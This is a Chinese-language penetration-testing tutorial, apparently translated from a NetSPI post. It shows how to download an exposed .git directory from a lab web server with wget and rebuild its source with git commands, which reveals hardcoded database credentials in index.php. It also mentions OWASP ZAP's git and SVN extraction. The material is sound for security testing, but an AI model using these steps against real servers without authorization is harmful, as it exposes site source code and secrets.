原文地址:
https://blog.netspi.com/dumping-git-data-from-misconfigured-web-servers/
通常情况:
检查 git repository最简单的方法是查找.git文件夹
可以使用Nessus, Nikto, 和nmap等工具来完成该任务。
通常我会首先检查config文件
接下来获取.git文件夹下的所有文件:
wget -r http://192.168.37.128/.git/
我们获得了web服务器的Git repository
root@kali:~/192.168.37.128: ls -al
total 12
drwxr-xr-x 3 root root 4096 Dec 26 14:28 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x 8 root root 4096 Dec 26 14:28 .git
root@kali:~/192.168.37.128#
git status可以查看本地和web server的区别:
root@kali:~/192.168.37.128: git status
# On branch master
# Changes not staged for commit:
# (use "git add/rm <file>..." to update what will be committed)
# (use "git checkout -- <file>..." to discard changes in working directory)
#
# deleted: index.php
#
no changes added to commit (use "git add" and/or "git commit -a")
可以看到在我们的repository中缺少index.php文件
对于文件很少的repositories ,我们可以diff区别来查看我们缺少的文件的内容:
root@kali:~/192.168.37.128: git diff
diff --git a/index.php b/index.php
deleted file mode 100644
index 2bd0989..0000000
--- a/index.php
+++ /dev/null
@@ -1,13 +0,0 @@
-Hello World!
-
-<?php
-$servername = "localhost";
-$username = "admin";
-$password = "password";
-
-$conn = new mysqli($servername, $username, $password);
-
-if ($conn->connect_error) {
- die("Connection failed: " . $conn->connect_error);
-}
-?>
这样我们就可以看到index.php文件。
可以使用 git reset –hard来回到上一次commit时的状态。
root@kali:~/192.168.37.128: git reset --hard
HEAD is now at ec53e64 hello world
root@kali:~/192.168.37.128: ls -al
total 16
drwxr-xr-x 3 root root 4096 Dec 26 14:37 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x 8 root root 4096 Dec 26 14:37 .git
-rw-r--r-- 1 root root 238 Dec 26 14:37 index.php
root@kali:~/192.168.37.128:
git在objects文件中存储文件信息:
root@kali:~/192.168.37.128/.git/objects: ls -al
total 64
drwxr-xr-x 16 root root 4096 Dec 26 14:28 .
drwxr-xr-x 8 root root 4096 Dec 26 14:37 ..
drwxr-xr-x 2 root root 4096 Dec 26 14:28 04
drwxr-xr-x 2 root root 4096 Dec 26 14:28 07
drwxr-xr-x 2 root root 4096 Dec 26 14:28 26
drwxr-xr-x 2 root root 4096 Dec 26 14:28 2b
drwxr-xr-x 2 root root 4096 Dec 26 14:28 83
drwxr-xr-x 2 root root 4096 Dec 26 14:28 8d
drwxr-xr-x 2 root root 4096 Dec 26 14:28 8f
drwxr-xr-x 2 root root 4096 Dec 26 14:28 93
drwxr-xr-x 2 root root 4096 Dec 26 14:28 ae
drwxr-xr-x 2 root root 4096 Dec 26 14:28 ec
drwxr-xr-x 2 root root 4096 Dec 26 14:28 f2
drwxr-xr-x 2 root root 4096 Dec 26 14:28 f3
drwxr-xr-x 2 root root 4096 Dec 26 14:28 info
drwxr-xr-x 2 root root 4096 Dec 26 14:28 pack
有一些只有两个字符的文件夹,他们里面含有一些随机字符命名的文件:
引用
root@kali:~/192.168.37.128/.git/objects/2b: ls -al
total 12
drwxr-xr-x 2 root root 4096 Dec 26 14:28 .
drwxr-xr-x 16 root root 4096 Dec 26 14:28 ..
-rw-r--r-- 1 root root 171 Dec 26 13:32 d098976cb507fc498b5e8f5109607faa6cf645
这些文件夹和其中的文件实际上为blob数据创建SHA-1。每个SHA-1含有repository中每个文件的bits/pieces。
我们可以使用下面的命令查看index.php的SHA-1信息
git cat-file -p master^{tree}
root@kali:~/192.168.37.128/.git: git cat-file -p master^{tree}
100644 blob 2bd098976cb507fc498b5e8f5109607faa6cf645 index.php
该命令的作用是显示master分支中的每个文件的SHA-1
我们可以把这些SHA-1传递给git cat-file 来显示文件内容
root@kali:~/192.168.37.128/.git: git cat-file -p 2bd098976cb507fc498b5e8f5109607faa6cf645
Hello World!
<?php
$servername = "localhost";
$username = "admin";
$password = "password";
$conn = new mysqli($servername, $username, $password);
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
?>
OWASP Zed Attack Proxy (ZAP) 可以自动从暴露的git文件夹中提取文件(通常是app的代码)。ZAP的一个优点是它不需要设置directory listing为启动状态。相反ZAP匹配内部git文件然后直接提取代码而不需要依赖额外的工具,例如git客户端。
ZAP还可以提取SVN文件夹。